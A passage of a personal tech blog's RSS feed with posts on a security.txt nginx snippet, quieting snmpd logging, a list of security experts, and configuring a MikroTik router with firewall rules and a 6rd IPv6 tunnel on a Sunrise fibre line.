  2236.    <content:encoded><![CDATA[<p>Received a badge from GitHub's <a href="https://github.com/readme/nasa-ingenuity-helicopter" title="Open Source on Mars: Community powers NASA’s Ingenuity Helicopter - The ReadMe Project">Open Source on Mars</a> <a href="https://github.blog/2021-04-19-open-source-goes-to-mars/" title="Open source goes to Mars - The GitHub Blog">initiative</a> :-)</p>
  2237.  
  2238. <p><a href="https://github.com/x-way"><img src="https://blog.x-way.org/images/github_mars_2020_helicopter_contributor.png" alt="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" title="Mars 2020 Helicopter Contributor - Andreas Jaggi contributed code to 1 repository used in the Mars 2020 Helicopter Mission: torvalds/linux" width="333" height="117"></a></p>
  2239. ]]></content:encoded>
  2240.  </item>
  2241.  
  2242.  <item>
  2243.    <title>Top 21 Security Experts to follow on Twitter in 2021</title>
  2244.    <link>https://blog.x-way.org/Networking/2021/04/17/Top-21-Security-Experts-to-follow-on-Twitter-in-2021.html</link>
  2245.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324288</guid>
  2246.    <dc:creator>Andreas Jaggi</dc:creator>
  2247.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2248.    <pubDate>Sat, 17 Apr 2021 06:58:00 +0000</pubDate>
  2249.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2250.    <description><![CDATA[<p>From the <a href="https://web.archive.org/web/20210412004031/https://securityboulevard.com/2021/04/top-21-cybersecurity-experts-you-must-follow-on-twitter-in-2021/" title="Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021 - Security Boulevard (archive.org)">article on Security Boulevard</a>.</p>
  2251. <ol>
  2252. <li><a href="https://twitter.com/rafaybaloch" title="Rafay Baloch (@rafaybaloch) / Twitter">Rafay Baloch</a></li>
  2253. <li><a href="https://twitter.com/troyhunt" title="Troy Hunt (@troyhunt) / Twitter">Troy Hunt</a></li>
  2254. <li><a href="https://twitter.com/kevinmitnick" title="Kevin Mitnick (@kevinmitnick) / Twitter">Kevin Mitnick</a></li>
  2255. <li><a href="https://twitter.com/RachelTobac" title="Rachel Tobac (@RachelTobac) / Twitter">Rachel Tobac</a></li>
  2256. <li><a href="https://twitter.com/mikko" title="Mikko Hyppönen (@mikko) / Twitter">Mikko Hyppönen</a></li>
  2257. <li><a href="https://twitter.com/k8em0" title="Katie Moussouris (@k8em0) / Twitter">Katie Moussouris</a></li>
  2258. <li><a href="https://twitter.com/schneierblog" title="Bruce Schneier (@schneierblog) / Twitter">Bruce Schneier</a></li>
  2259. <li><a href="https://twitter.com/briankrebs" title="Brian Krebs (@briankrebs) / Twitter">Brian Krebs</a></li>
  2260. <li><a href="https://twitter.com/jeremiahg" title="Jeremiah Grossman (@jeremiahg) / Twitter">Jeremiah Grossman</a></li>
  2261. <li><a href="https://twitter.com/e_kaspersky" title="Eugene Kaspersky (@e_kaspersky) / Twitter">Eugene Kaspersky</a></li>
  2262. <li><a href="https://twitter.com/govcso" title="Dan Lohemann (@govcso) / Twitter">Dan Lohemann</a></li>
  2263. <li><a href="https://twitter.com/CybersecuritySF" title="Steve Morgan (@CybersecuritySF) / Twitter">Steve Morgan</a></li>
  2264. <li><a href="https://twitter.com/TylerCohenWood" title="Tyler Cohen Wood (@TylerCohenWood) / Twitter">Tyler Cohen Wood</a></li>
  2265. <li><a href="https://twitter.com/gcluley" title="Graham Cluley (@gcluley) / Twitter">Graham Cluley</a></li>
  2266. <li><a href="https://twitter.com/TrackerPayton" title="Theresa Payton (@TrackerPayton) / Twitter">Theresa Payton</a></li>
  2267. <li><a href="https://twitter.com/Shirastweet" title="Shira Rubinoff (@Shirastweet) / Twitter">Shira Rubinoff</a></li>
  2268. <li><a href="https://twitter.com/evacide" title="Eva Galperin (@evacide) / Twitter">Eva Galperin</a></li>
  2269. <li><a href="https://twitter.com/marcusjcarey" title="Marcus J. Carey (@marcusjcarey) / Twitter">Marcus J. Carey</a></li>
  2270. <li><a href="https://twitter.com/jaysonstreet" title="Jayson E Street (@jaysonstreet) / Twitter">Jayson E Street</a></li>
  2271. <li><a href="https://twitter.com/securityweekly" title="Paul Asadoorian (@securityweekly) / Twitter">Paul Asadoorian</a></li>
  2272. <li><a href="https://twitter.com/adam_k_levin" title="Adam K. Levin (@adam_k_levin) / Twitter">Adam K. Levin</a></li>
  2273. </ol>
  2274. ]]></description>
  2275.    <content:encoded><![CDATA[<p>From the <a href="https://web.archive.org/web/20210412004031/https://securityboulevard.com/2021/04/top-21-cybersecurity-experts-you-must-follow-on-twitter-in-2021/" title="Top-21 Cybersecurity Experts You Must Follow on Twitter in 2021 - Security Boulevard (archive.org)">article on Security Boulevard</a>.</p>
  2276. <ol>
  2277. <li><a href="https://twitter.com/rafaybaloch" title="Rafay Baloch (@rafaybaloch) / Twitter">Rafay Baloch</a></li>
  2278. <li><a href="https://twitter.com/troyhunt" title="Troy Hunt (@troyhunt) / Twitter">Troy Hunt</a></li>
  2279. <li><a href="https://twitter.com/kevinmitnick" title="Kevin Mitnick (@kevinmitnick) / Twitter">Kevin Mitnick</a></li>
  2280. <li><a href="https://twitter.com/RachelTobac" title="Rachel Tobac (@RachelTobac) / Twitter">Rachel Tobac</a></li>
  2281. <li><a href="https://twitter.com/mikko" title="Mikko Hyppönen (@mikko) / Twitter">Mikko Hyppönen</a></li>
  2282. <li><a href="https://twitter.com/k8em0" title="Katie Moussouris (@k8em0) / Twitter">Katie Moussouris</a></li>
  2283. <li><a href="https://twitter.com/schneierblog" title="Bruce Schneier (@schneierblog) / Twitter">Bruce Schneier</a></li>
  2284. <li><a href="https://twitter.com/briankrebs" title="Brian Krebs (@briankrebs) / Twitter">Brian Krebs</a></li>
  2285. <li><a href="https://twitter.com/jeremiahg" title="Jeremiah Grossman (@jeremiahg) / Twitter">Jeremiah Grossman</a></li>
  2286. <li><a href="https://twitter.com/e_kaspersky" title="Eugene Kaspersky (@e_kaspersky) / Twitter">Eugene Kaspersky</a></li>
  2287. <li><a href="https://twitter.com/govcso" title="Dan Lohemann (@govcso) / Twitter">Dan Lohemann</a></li>
  2288. <li><a href="https://twitter.com/CybersecuritySF" title="Steve Morgan (@CybersecuritySF) / Twitter">Steve Morgan</a></li>
  2289. <li><a href="https://twitter.com/TylerCohenWood" title="Tyler Cohen Wood (@TylerCohenWood) / Twitter">Tyler Cohen Wood</a></li>
  2290. <li><a href="https://twitter.com/gcluley" title="Graham Cluley (@gcluley) / Twitter">Graham Cluley</a></li>
  2291. <li><a href="https://twitter.com/TrackerPayton" title="Theresa Payton (@TrackerPayton) / Twitter">Theresa Payton</a></li>
  2292. <li><a href="https://twitter.com/Shirastweet" title="Shira Rubinoff (@Shirastweet) / Twitter">Shira Rubinoff</a></li>
  2293. <li><a href="https://twitter.com/evacide" title="Eva Galperin (@evacide) / Twitter">Eva Galperin</a></li>
  2294. <li><a href="https://twitter.com/marcusjcarey" title="Marcus J. Carey (@marcusjcarey) / Twitter">Marcus J. Carey</a></li>
  2295. <li><a href="https://twitter.com/jaysonstreet" title="Jayson E Street (@jaysonstreet) / Twitter">Jayson E Street</a></li>
  2296. <li><a href="https://twitter.com/securityweekly" title="Paul Asadoorian (@securityweekly) / Twitter">Paul Asadoorian</a></li>
  2297. <li><a href="https://twitter.com/adam_k_levin" title="Adam K. Levin (@adam_k_levin) / Twitter">Adam K. Levin</a></li>
  2298. </ol>
  2299. ]]></content:encoded>
  2300.  </item>
  2301.  
  2302.  <item>
  2303.    <title>security.txt</title>
  2304.    <link>https://blog.x-way.org/Webdesign/2021/03/28/security-txt.html</link>
  2305.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324287</guid>
  2306.    <dc:creator>Andreas Jaggi</dc:creator>
  2307.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2308.    <pubDate>Sun, 28 Mar 2021 08:16:00 +0000</pubDate>
  2309.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  2310.    <description><![CDATA[<p>This website now also serves a <a href="https://securitytxt.org/" title="security.txt: Proposed standard for defining security policies">security.txt</a> file which is a standardized way of making security contact information available. (<a href="https://en.wikipedia.org/wiki/Security.txt" title="security.txt - Wikipedia">Wikipedia</a>)</p>
  2311. <p>The file is available in two locations <a href="https://blog.x-way.org/security.txt">/security.txt</a> (the classic location) and <a href="https://blog.x-way.org/.well-known/security.txt">/.well-known/security.txt</a> (the standard location following RFC8615).</p>
  2312.  
  2313. <p>To easily add the file on all my domains, I'm using the following nginx config snippet.</p>
  2314. <pre>location /security.txt {
  2315. add_header Content-Type 'text/plain';
  2316. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  2317. add_header Pragma 'no-cache';
  2318. add_header Expires '0';
  2319. add_header Vary '*';
  2320. return 200 "Contact: mailto:andreas+security.txt@jaggi.info\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption: http://andreas-jaggi.ch/A3A54203.asc\n";
  2321. }
  2322.  
  2323. location /.well-known/security.txt {
  2324. add_header Content-Type 'text/plain';
  2325. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  2326. add_header Pragma 'no-cache';
  2327. add_header Expires '0';
  2328. add_header Vary '*';
  2329. return 200 "Contact: mailto:andreas+security.txt@jaggi.info\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption: http://andreas-jaggi.ch/A3A54203.asc\n";
  2330. }</pre>
  2331.  
  2332. <p>This snippet is stored in a dedicated file (/etc/nginx/conf_includes/securitytxt) and is included in the various server config blocks like this:</p>
  2333. <pre>server {
  2334. server_name example.com;
  2335.  
  2336. include /etc/nginx/conf_includes/securitytxt;
  2337.  
  2338. location / {
  2339. # rest of website
  2340. }
  2341. }</pre>
  2342. ]]></description>
  2343.    <content:encoded><![CDATA[<p>This website now also serves a <a href="https://securitytxt.org/" title="security.txt: Proposed standard for defining security policies">security.txt</a> file which is a standardized way of making security contact information available. (<a href="https://en.wikipedia.org/wiki/Security.txt" title="security.txt - Wikipedia">Wikipedia</a>)</p>
  2344. <p>The file is available in two locations <a href="https://blog.x-way.org/security.txt">/security.txt</a> (the classic location) and <a href="https://blog.x-way.org/.well-known/security.txt">/.well-known/security.txt</a> (the standard location following RFC8615).</p>
  2345.  
  2346. <p>To easily add the file on all my domains, I'm using the following nginx config snippet.</p>
  2347. <pre>location /security.txt {
  2348. add_header Content-Type 'text/plain';
  2349. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  2350. add_header Pragma 'no-cache';
  2351. add_header Expires '0';
  2352. add_header Vary '*';
  2353. return 200 "Contact: mailto:andreas+security.txt@jaggi.info\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption: http://andreas-jaggi.ch/A3A54203.asc\n";
  2354. }
  2355.  
  2356. location /.well-known/security.txt {
  2357. add_header Content-Type 'text/plain';
  2358. add_header Cache-Control 'no-cache, no-store, must-revalidate';
  2359. add_header Pragma 'no-cache';
  2360. add_header Expires '0';
  2361. add_header Vary '*';
  2362. return 200 "Contact: mailto:andreas+security.txt@jaggi.info\nExpires: Tue, 19 Jan 2038 03:14:07 +0000\nEncryption: http://andreas-jaggi.ch/A3A54203.asc\n";
  2363. }</pre>
  2364.  
  2365. <p>This snippet is stored in a dedicated file (/etc/nginx/conf_includes/securitytxt) and is included in the various server config blocks like this:</p>
  2366. <pre>server {
  2367. server_name example.com;
  2368.  
  2369. include /etc/nginx/conf_includes/securitytxt;
  2370.  
  2371. location / {
  2372. # rest of website
  2373. }
  2374. }</pre>
  2375. ]]></content:encoded>
  2376.  </item>
  2377.  
  2378.  <item>
  2379.    <title>Fixing 'snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)' messages</title>
  2380.    <link>https://blog.x-way.org/Linux/2021/02/13/Fixing-snmpd-error-on-subcontainer-ia-addr-insert-messages.html</link>
  2381.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324284</guid>
  2382.    <dc:creator>Andreas Jaggi</dc:creator>
  2383.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2384.    <pubDate>Sat, 13 Feb 2021 08:57:00 +0000</pubDate>
  2385.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  2386.    <description><![CDATA[<p>The default configuration of snmpd on Debian has debug level logging enabled and thus we end up with a constant flood of these messages in /var/log/syslog</p>
  2387. <pre>snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)</pre>
  2388. <p>The fix is to lower the logging level, which can be accomplished like this on systems with systemd:</p>
  2389. <pre>cp /lib/systemd/system/snmpd.service /etc/systemd/system/snmpd.service
  2390. sed -i 's/Lsd/LS6d/' /etc/systemd/system/snmpd.service
  2391. systemctl daemon-reload
  2392. systemctl restart snmpd</pre>
  2393. <p>On systems without systemd, the logging level is set by the init script (unless explicitly configured in /etc/default/snmpd), and can be changed like this:</p>
  2394. <pre>sed -i 's/Lsd/LS6d/g' /etc/default/snmpd
  2395. sed -i 's/Lsd/LS6d/g' /etc/init.d/snmpd
  2396. service snmpd restart</pre>
  2397. ]]></description>
  2398.    <content:encoded><![CDATA[<p>The default configuration of snmpd on Debian has debug level logging enabled and thus we end up with a constant flood of these messages in /var/log/syslog</p>
  2399. <pre>snmpd[19784]: error on subcontainer 'ia_addr' insert (-1)</pre>
  2400. <p>The fix is to lower the logging level, which can be accomplished like this on systems with systemd:</p>
  2401. <pre>cp /lib/systemd/system/snmpd.service /etc/systemd/system/snmpd.service
  2402. sed -i 's/Lsd/LS6d/' /etc/systemd/system/snmpd.service
  2403. systemctl daemon-reload
  2404. systemctl restart snmpd</pre>
  2405. <p>On systems without systemd, the logging level is set by the init script (unless explicitly configured in /etc/default/snmpd), and can be changed like this:</p>
  2406. <pre>sed -i 's/Lsd/LS6d/g' /etc/default/snmpd
  2407. sed -i 's/Lsd/LS6d/g' /etc/init.d/snmpd
  2408. service snmpd restart</pre>
  2409. ]]></content:encoded>
  2410.  </item>
  2411.  
  2412.  <item>
  2413.    <title>Embracing the future with SolNet</title>
  2414.    <link>https://blog.x-way.org/Networking/2021/02/04/Embracing-the-future-with-SolNet.html</link>
  2415.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324285</guid>
  2416.    <dc:creator>Andreas Jaggi</dc:creator>
  2417.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2418.    <pubDate>Thu, 04 Feb 2021 10:01:00 +0000</pubDate>
  2419.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2420.    <description><![CDATA[<p>This was the initial state of my new <a href="https://www.solnet.ch/" title="SolNet - Internet &amp; Solution Provider">SolNet</a> fibre connection:</p>
  2421. <p><img src="https://blog.x-way.org/images/solnet-ipv6-only.png" alt="SolNet connection with native IPv6 but no IPv4" width="487" height="61"></p>
  2422. <p>As I am a proponent of IPv6 this made me very happy, but unfortunately about 20% of my daily websites only offer <a href="https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html">legacy Internet</a> (which later on I got working as well).</p>
  2423. ]]></description>
  2424.    <content:encoded><![CDATA[<p>This was the initial state of my new <a href="https://www.solnet.ch/" title="SolNet - Internet &amp; Solution Provider">SolNet</a> fibre connection:</p>
  2425. <p><img src="https://blog.x-way.org/images/solnet-ipv6-only.png" alt="SolNet connection with native IPv6 but no IPv4" width="487" height="61"></p>
  2426. <p>As I am a proponent of IPv6 this made me very happy, but unfortunately about 20% of my daily websites only offer <a href="https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html">legacy Internet</a> (which later on I got working as well).</p>
  2427. ]]></content:encoded>
  2428.  </item>
  2429.  
  2430.  <item>
  2431.    <title>Prozentrechnen ist schwer</title>
  2432.    <link>https://blog.x-way.org/Misc/2021/02/04/Prozentrechnen-ist-schwer.html</link>
  2433.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324286</guid>
  2434.    <dc:creator>Andreas Jaggi</dc:creator>
  2435.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2436.    <pubDate>Thu, 04 Feb 2021 08:20:00 +0000</pubDate>
  2437.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  2438.    <description><![CDATA[<p><a href="https://www.truewealth.ch/" title="True Wealth - Swiss Online Wealth Management">TrueWealth</a> hat's nicht so mit Prozentrechnen:</p>
  2439. <p><img src="https://blog.x-way.org/images/truewealth-prozentrechnen.png" title="6 + 33 + 3 + 12 + 47 = ?" alt="6 + 33 + 3 + 12 + 47 = ?" width="335" height="196"></p>
  2440. ]]></description>
  2441.    <content:encoded><![CDATA[<p><a href="https://www.truewealth.ch/" title="True Wealth - Swiss Online Wealth Management">TrueWealth</a> hat's nicht so mit Prozentrechnen:</p>
  2442. <p><img src="https://blog.x-way.org/images/truewealth-prozentrechnen.png" title="6 + 33 + 3 + 12 + 47 = ?" alt="6 + 33 + 3 + 12 + 47 = ?" width="335" height="196"></p>
  2443. ]]></content:encoded>
  2444.  </item>
  2445.  
  2446.  <item>
  2447.    <title>Using your own router on a Sunrise fiber line</title>
  2448.    <link>https://blog.x-way.org/Networking/2020/12/05/Using-your-own-router-on-a-Sunrise-fiber-line.html</link>
  2449.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324283</guid>
  2450.    <dc:creator>Andreas Jaggi</dc:creator>
  2451.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  2452.    <pubDate>Sat, 05 Dec 2020 22:26:00 +0000</pubDate>
  2453.    <category domain="https://blog.x-way.org/Networking">Networking</category>
  2454.    <description><![CDATA[<p>Sunrise does not like when people run their own router on a fiber line. While they do not directly forbid it, they don't provide any of the required configuration parameters which makes it quite hard to use your own router.</p>
  2455. <p>Below you'll find the required configuration parameters to make your own router connect with IPv4 and IPv6 on a Sunrise fiber line.<br>Beware though that especially the VLAN configuration might be different depending on your city, the following worked for me in Zürich.</p>
  2456. <p>Also, please note that I do not recommend Sunrise as Internet provider (as a matter of fact I'm on the way out of their contract and switching to <a href="https://www.solnet.ch/" title="SolNet">SolNet</a>).<br>Besides not supporting to bring your own router, they also like to make up additional early-termination fees (the contract states 100CHF early termination fees, but once you call them to initiate the process they tell you that it's gonna cost 300CHF as they decided to change their pricing structure unilaterally).</p>
  2457.  
  2458. <p>Enough of the ranting, now to the interesting part :-)</p>
  2459.  
  2460. <p>The Sunrise line has multiple VLANs to differentiate between Internet, Phone and TV services.<br>To receive an IPv4 address it requires a special value for the Client Identifier DHCP option.<br>For IPv6 <a href="https://en.wikipedia.org/wiki/IPv6_rapid_deployment" title="IPv6 rapid deployment">6rd</a> is employed, for which we need to know the prefix and gateway address.</p>
  2461.  
  2462. <p>The following configuration was tested with a <a href="https://mikrotik.com/" title="MikroTik Routers and Wireless">MikroTik</a> CRS125 router starting from the default settings.<br>For simplicity I've named the network interfaces according to their intended usage (eg. <code>LAN</code>, <code>sunrise</code> and <code>6rd</code>).</p>
  2463.  
  2464. <p>The first step is to configure the VLAN on top of your fiber interface. In my case it was VLAN ID 131, others were also successful with VLAN ID 10.</p>
  2465.  
  2466. <pre>/interface vlan add interface=sfp1-gateway name=sunrise vlan-id=131</pre>
  2467.  
  2468. <p>Next let's put in place some basic firewall rules to make sure we're not exposing our LAN to the Internet once the connection comes up.</p>
  2469. <pre>/ip firewall filter
  2470. add action=accept chain=forward connection-state=established,related
  2471. add action=accept chain=forward in-interface=LAN out-interface=sunrise
  2472. add action=drop chain=forward
  2473. add action=accept chain=input connection-state=established,related
  2474. add action=accept chain=input protocol=icmp
  2475. add action=drop chain=input in-interface=!LAN</pre>
  2476. <pre>/ip firewall nat
  2477. add action=masquerade chain=srcnat out-interface=sunrise</pre>
  2478.  
  2479. <p>Now we can configure the special value for the Client Identifier DHCP option and configure the DHCP client on the VLAN interface.</p>
  2480. <pre>/ip dhcp-client option add code=61 name=clientid-sunrise value="'dslforum.org,Fast5360-sunrise'"</pre>
  2481. <pre>/ip dhcp-client add dhcp-options=clientid-sunrise disabled=no interface=sunrise</pre>
  2482.  
  2483. <p>This should now give us IPv4 Internet connectivity. We can test this by checking that we received an IPv4 address, have an IPv4 default route and that we can ping a host in the Internet.</p>
  2484.  
  2485. <pre>/ip dhcp-client print
  2486. Flags: X - disabled, I - invalid, D - dynamic
  2487. #   INTERFACE       USE-PEER-DNS ADD-DEFAULT-ROUTE STATUS        ADDRESS
  2488. 0   sunrise         yes          yes               bound         198.51.100.123/25</pre>
  2489. <pre>/ip route check 1.1
  2490.     status: ok
  2491.  interface: sunrise
  2492.    nexthop: 198.51.100.1</pre>
  2493. <pre>/ping count=1 1.1
  2494.  SEQ HOST                                     SIZE TTL TIME  STATUS
  2495.    0 1.0.0.1                                    56  59 1ms
  2496.    sent=1 received=1 packet-loss=0% min-rtt=1ms avg-rtt=1ms max-rtt=1ms</pre>
  2497.  
  2498. <p>Sunrise doesn't offer native IPv6 connectivity but employs 6rd (which defines how to create a 6to4 tunnel based on the public IPv4 address, an IPv6 prefix and the tunnel gateway).</p>
  2499. <p>Before we setup the 6rd tunnel, it's important to put in place firewall rules for IPv6 as afterwards all devices on the local network will receive a public IPv6 address.</p>
  2500. <pre>/ipv6 firewall filter
  2501. add action=accept chain=forward connection-state=established,related
  2502. add action=accept chain=forward in-interface=LAN
  2503. add action=drop chain=forward
  2504. add action=accept chain=input connection-state=established,related
  2505. add action=accept chain=input protocol=icmpv6
  2506. add action=drop chain=input</pre>
  2507.  
  2508. <p>To setup the 6rd tunnel, I've modified an existing script with the specific parameters for Sunrise (namely the <kbd>2001:1710::/28</kbd> prefix and the <kbd>212.161.209.1</kbd> tunnel gateway address).<br>The script creates the tunnel interface, configures an IPv6 address on the external interface, configures an IPv6 address on the internal interface (which also enables SLAAC to provide IPv6 addresses to the clients on the local network) and configures an IPv6 default route over the 6rd tunnel.</p>
  2509. <p>The script itself will be run via the scheduler, thus let's save it under the name <kbd>6rd-script</kbd>.</p>
  2510. <pre>
  2511. :global ipv6localinterface "LAN"
  2512. :global uplinkinterface "sunrise"
  2513.  
  2514. :global IPv4addr [/ip address get [find interface=$uplinkinterface] address];
  2515. :global IPv4addr [:pick $IPv4addr 0 [:find $IPv4addr "/"]]
  2516. :global IPv4addr2 [:pick $IPv4addr 0 30]
  2517. :global IPv6temp [:toip6 ("1::" . $IPv4addr2)]
  2518.  
  2519. :global IPv4hex1 [:pick $IPv6temp 3 4]
  2520. :global IPv4hex2 [:pick $IPv6temp 4 7]
  2521. :global IPv4hex3 [:pick $IPv6temp 8 9]
  2522. :global IPv4hex4 [:pick $IPv6temp 9 12]
  2523. :global IPv6addr [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 .$IPv4hex3 . ":" . $IPv4hex4 . "0::1/64")]
  2524. :global IPv6addrLoc [("2001:171" . $IPv4hex1 . ":". $IPv4hex2 . $IPv4hex3 . ":" . $IPv4hex4 . "1::1/64")]
  2525.  
  2526. #6to4 interface
  2527. :global 6to4id [/interface 6to4 find where name="6rd"]
  2528. :if ($6to4id!="") do={
  2529. :global 6to4addr [/interface 6to4 get $6to4id local-address]
  2530. if ($6to4addr != $IPv4addr) do={ :log warning "Updating local-address for 6to4 tunnel '6rd' from '$6to4addr' to '$IPv4addr'."; /interface 6to4 set [find name="6rd"] local-address=$IPv4addr }
  2531. } else { :log warning "Creating 6to4 interface '6rd'. "; /interface 6to4 add !keepalive local-address=$IPv4addr mtu=1480 name="6rd" remote-address=212.161.209.1 }
  2532.  
  2533. #ipv6 for uplink
  2534. :global IPv6addrnumber [/ipv6 address find where comment="6rd" and interface="6rd"]
  2535. :if ($IPv6addrnumber!="") do={
  2536. :global oldip ([/ipv6 address get $IPv6addrnumber address])
  2537. if ($oldip != $IPv6addr) do={ :log warning "Updating 6rd IPv6 from '$oldip' to '$IPv6addr'."; /ipv6 address set number=$IPv6addrnumber address=$IPv6addr disabled=no }
  2538. } else {:log warning "Setting up 6rd IPv6 '$IPv6addr' to '6rd'. "; /ipv6 address add address=$IPv6addr interface="6rd" comment="6rd" advertise=no }
  2539.  
  2540. #ipv6 for local
  2541. :global IPv6addrnumberLocal [/ipv6 address find where comment=("6rd_local") and interface=$ipv6localinterface]
  2542. :if ($IPv6addrnumberLocal!="") do={
  2543. :global oldip ([/ipv6 address get $IPv6addrnumberLocal address])
  2544. if ($oldip != $IPv6addrLoc) do={ :log warning "Updating 6rd LOCAL IPv6 from '$oldip' to '$IPv6addrLoc'."; /ipv6 address set number=$IPv6addrnumberLocal address=$IPv6addrLoc disabled=no }
  2545. } else {:log warning "Setting up 6rd LOCAL IPv6 '$IPv6addrLoc' na '$ipv6localinterface'. "; /ipv6 address add address=$IPv6addrLoc interface=$ipv6localinterface comment="6rd_local" advertise=yes }
  2546.  
  2547. #ipv6 route
  2548. :global routa [/ipv6 route find where dst-address="2000::/3" and gateway="6rd"]
  2549. if ($routa="") do={ :log warning "Setting IPv6 route '2000::/3' pres '6rd'. "; /ipv6 route add distance=1 dst-address="2000::/3" gateway="6rd" }
  2550. </pre>
  2551.  
  2552. <p>Once we've added the script we also need to create the scheduler entry to run it periodically (as it needs to re-configure the tunnel and addresses whenever the public IPv4 address changes).</p>
  2553. <pre>/system scheduler add interval=1m name=schedule1 on-event=6rd-script</pre>
  2554.  
  2555. <p>After the first run of the script we should now have IPv6 connectivity. Let's test this again by checking that we have a public IPv6 address, an IPv6 default route and can ping an IPv6 host in the Internet.</p>
  2556.  
  2557. <pre>/ipv6 address print where interface=6rd and global
  2558. Flags: X - disabled, I - invalid, D - dynamic, G - global, L - link-local
  2559. #    ADDRESS                                     FROM-POOL INTERFACE        ADVERTISE
  2560. 0  G ;;; 6rd
  2561.      2001:171c:6336:47b0::1/64                             6rd              no</pre>
  2562. <pre>/ipv6 route check 2600::
  2563.     status: ok
  2564.  interface: 6rd
  2565.    nexthop: 2600::</pre>
  2566. <pre>/ping count=1 2600::
  2567.  SEQ HOST                                     SIZE TTL TIME  STATUS
  2568.    0 2600::                                     56  50 118ms echo reply
  2569.    sent=1 received=1 packet-loss=0% min-rtt=118ms avg-rtt=118ms max-rtt=118ms</pre>
  2570.  
  2571. <p>And that's how you can configure and validate IPv4 and IPv6 connectivity with your own router on a Sunrise fiber line despite them not liking it very much ;-)</p>
  2572. ]]></description>
  2573.    <content:encoded><![CDATA[<p>Sunrise does not like when people run their own router on a fiber line. While they do not directly forbid it, they don't provide any of the required configuration parameters which makes it quite hard to use your own router.</p>
  2574. <p>Below you'll find the required configuration parameters to make your own router connect with IPv4 and IPv6 on a Sunrise fiber line.<br>Beware though that especially the VLAN configuration might be different depending on your city, the following worked for me in Zürich.</p>
  2575. <p>Also, please note that I do not recommend Sunrise as Internet provider (as a matter of fact I'm on the way out of their contract and switching to <a href="https://www.solnet.ch/" title="SolNet">SolNet</a>).<br>Besides not supporting to bring your own router, they also like to make up additional early-termination fees (the contract states 100CHF early termination fees, but once you call them to initiate the process they tell you that it's gonna cost 300CHF as they decided to change their pricing structure unilaterally).</p>
  2576.  
  2577. <p>Enough of the ranting, now to the interesting part :-)</p>
  2578.  
  2579. <p>The Sunrise line has multiple VLANs to differentiate between Internet, Phone and TV services.<br>To receive an IPv4 address it requires a special value for the Client Identifier DHCP option.<br>For IPv6 <a href="https://en.wikipedia.org/wiki/IPv6_rapid_deployment" title="IPv6 rapid deployment">6rd</a> is employed, for which we need to know the prefix and gateway address.</p>
  2580.  
  2581. <p>The following configuration was tested with a <a href="https://mikrotik.com/" title="MikroTik Routers and Wireless">MikroTik</a> CRS125 router starting from the default settings.<br>For simplicity I've named the network interfaces according to their intended usage (eg. <code>LAN</code>, <code>sunrise</code> and <code>6rd</code>).</p>
  2582.  
  2583. <p>The first step is to configure the VLAN on top of your fiber interface. In my case it was VLAN ID 131, others were also successful with VLAN ID 10.</p>
  2584.  
  2585. <pre>/interface vlan add interface=sfp1-gateway name=sunrise vlan-id=131</pre>
  2586.  
  2587. <p>Next let's put in place some basic firewall rules to make sure we're not exposing our LAN to the Internet once the connection comes up.</p>
  2588. <pre>/ip firewall filter
  2589. add action=accept chain=forward connection-state=established,related
  2590. add action=accept chain=forward in-interface=LAN out-interface=sunrise
  2591. add action=drop chain=forward
  2592. add action=accept chain=input connection-state=established,related
  2593. add action=accept chain=input protocol=icmp
  2594. add action=drop chain=input in-interface=!LAN</pre>
  2595. <pre>/ip firewall nat
  2596. add action=masquerade chain=srcnat out-interface=sunrise</pre>
  2597.  
  2598. <p>Now we can configure the special value for the Client Identifier DHCP option and configure the DHCP client on the VLAN interface.</p>
  2599. <pre>/ip dhcp-client option add code=61 name=clientid-sunrise value="'dslforum.org,Fast5360-sunrise'"</pre>
  2600. <pre>/ip dhcp-client add dhcp-options=clientid-sunrise disabled=no interface=sunrise</pre>
  2601.  
  2602. <p>This should now give us IPv4 Internet connectivity. We can test this by checking that we received an IPv4 address, have an IPv4 default route and that we can ping a host in the Internet.</p>
  2603.  
  2604. <pre>/ip dhcp-client print
  2605. Flags: X - disabled, I - invalid, D - dynamic
  2606. #   INTERFACE       USE-PEER-DNS ADD-DEFAULT-ROUTE STATUS        ADDRESS
  2607. 0   sunrise         yes          yes               bound         198.51.100.123/25</pre>
  2608. <pre>/ip route check 1.1
  2609.     status: ok
  2610.  interface: sunrise
  2611.    nexthop: 198.51.100.1</pre>
  2612. <pre>/ping count=1 1.1
  2613.  SEQ HOST                                     SIZE TTL TIME  STATUS
  2614.    0 1.0.0.1                                    56  59 1ms
